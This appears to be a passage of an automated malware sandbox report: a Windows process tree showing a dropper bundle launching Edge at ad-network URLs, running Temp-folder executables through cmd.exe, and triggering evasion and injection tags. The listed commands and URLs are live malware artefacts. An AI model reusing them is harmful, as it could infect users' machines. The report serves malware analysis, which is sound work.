                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
                                                                                          10⤵
                                                                                            PID:3716
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                            10⤵
                                                                                              PID:5508
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                                                                                              10⤵
                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                              PID:6820
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
                                                                                              10⤵
                                                                                                PID:6032
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
                                                                                                10⤵
                                                                                                  PID:4292
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:1
                                                                                                  10⤵
                                                                                                    PID:6056
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3628 /prefetch:8
                                                                                                    10⤵
                                                                                                      PID:5956
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3628 /prefetch:8
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5776
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                                                                                                      10⤵
                                                                                                        PID:2352
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6076 /prefetch:2
                                                                                                        10⤵
                                                                                                          PID:6384
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6112 /prefetch:8
                                                                                                          10⤵
                                                                                                            PID:6900
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2008 /prefetch:8
                                                                                                            10⤵
                                                                                                              PID:6436
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
                                                                                                              10⤵
                                                                                                                PID:460
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
                                                                                                                10⤵
                                                                                                                  PID:5136
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1068 /prefetch:8
                                                                                                                  10⤵
                                                                                                                    PID:6196
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:8
                                                                                                                    10⤵
                                                                                                                      PID:804
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:8
                                                                                                                      10⤵
                                                                                                                        PID:2168
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                                                                                                                        10⤵
                                                                                                                          PID:4856
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
                                                                                                                          10⤵
                                                                                                                            PID:6816
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5824 /prefetch:8
                                                                                                                            10⤵
                                                                                                                              PID:2900
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
                                                                                                                              10⤵
                                                                                                                                PID:6912
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
                                                                                                                                10⤵
                                                                                                                                  PID:2428
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
                                                                                                                                  10⤵
                                                                                                                                    PID:696
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1056 /prefetch:1
                                                                                                                                    10⤵
                                                                                                                                      PID:2272
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
                                                                                                                                      10⤵
                                                                                                                                        PID:1224
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1
                                                                                                                                        10⤵
                                                                                                                                          PID:6448
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
                                                                                                                                          10⤵
                                                                                                                                            PID:860
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                          9⤵
                                                                                                                                            PID:4872
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de7746f8,0x7ff8de774708,0x7ff8de774718
                                                                                                                                              10⤵
                                                                                                                                                PID:5696
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                              9⤵
                                                                                                                                                PID:6704
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de7746f8,0x7ff8de774708,0x7ff8de774718
                                                                                                                                                  10⤵
                                                                                                                                                    PID:5568
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                  9⤵
                                                                                                                                                    PID:4032
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de7746f8,0x7ff8de774708,0x7ff8de774718
                                                                                                                                                      10⤵
                                                                                                                                                        PID:3080
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                      9⤵
                                                                                                                                                        PID:2980
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de7746f8,0x7ff8de774708,0x7ff8de774718
                                                                                                                                                          10⤵
                                                                                                                                                            PID:6972
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                          9⤵
                                                                                                                                                            PID:1644
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de7746f8,0x7ff8de774708,0x7ff8de774718
                                                                                                                                                              10⤵
                                                                                                                                                                PID:2760
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                                              9⤵
                                                                                                                                                                PID:6688
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de7746f8,0x7ff8de774708,0x7ff8de774718
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:3336
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c6-6c5e0-0cd-2be9e-65a9da9e5da7b\Gybumenuto.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\c6-6c5e0-0cd-2be9e-65a9da9e5da7b\Gybumenuto.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:3968
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wle2mmrr.3dh\GcleanerEU.exe /eufive & exit
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:6908
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wle2mmrr.3dh\GcleanerEU.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\wle2mmrr.3dh\GcleanerEU.exe /eufive
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:6360
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 260
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            PID:5468
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ym23pmbz.2fc\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:2976
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ym23pmbz.2fc\installer.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ym23pmbz.2fc\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                            10⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:6544
                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ym23pmbz.2fc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ym23pmbz.2fc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632041046 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                              11⤵
                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                              PID:5888
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ca4nko1a.2fw\anyname.exe & exit
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:6520
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ca4nko1a.2fw\anyname.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ca4nko1a.2fw\anyname.exe
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:6260
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\da0l231u.j3p\gcleaner.exe /mixfive & exit
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:5420
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  10⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                  PID:5872
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\da0l231u.j3p\gcleaner.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\da0l231u.j3p\gcleaner.exe /mixfive
                                                                                                                                                                                  10⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  PID:6388
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6388 -s 260
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:5448
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ydqo5tvj.tdc\autosubplayer.exe /S & exit
                                                                                                                                                                                9⤵
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:6404
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun06f07d4ec3d1.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4848
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06f07d4ec3d1.exe
                                                                                                                                                                          Sun06f07d4ec3d1.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5036
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Sun06b8d4aadadbfe71.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4548
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun06f1bd2971.exe
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3220
                                                                                                                                                                    • C:\Windows\System32\sihclient.exe
                                                                                                                                                                      C:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.2
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      PID:4108
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06f1bd2971.exe
                                                                                                                                                                      Sun06f1bd2971.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:5180
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpD38C_tmp.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\tmpD38C_tmp.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:3748
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpD38C_tmp.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\tmpD38C_tmp.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5620
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06b8d4aadadbfe71.exe
                                                                                                                                                                      Sun06b8d4aadadbfe71.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:5352
                                                                                                                                                                      • C:\Users\Admin\Documents\QUhAatHGnr5wcCt3IxVhsMWx.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\QUhAatHGnr5wcCt3IxVhsMWx.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:6100
                                                                                                                                                                      • C:\Users\Admin\Documents\Dn10t5EFnsstdB9qhMJ5W3oR.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\Dn10t5EFnsstdB9qhMJ5W3oR.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4792
                                                                                                                                                                          • C:\Users\Admin\Documents\Dn10t5EFnsstdB9qhMJ5W3oR.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\Dn10t5EFnsstdB9qhMJ5W3oR.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                            PID:6692
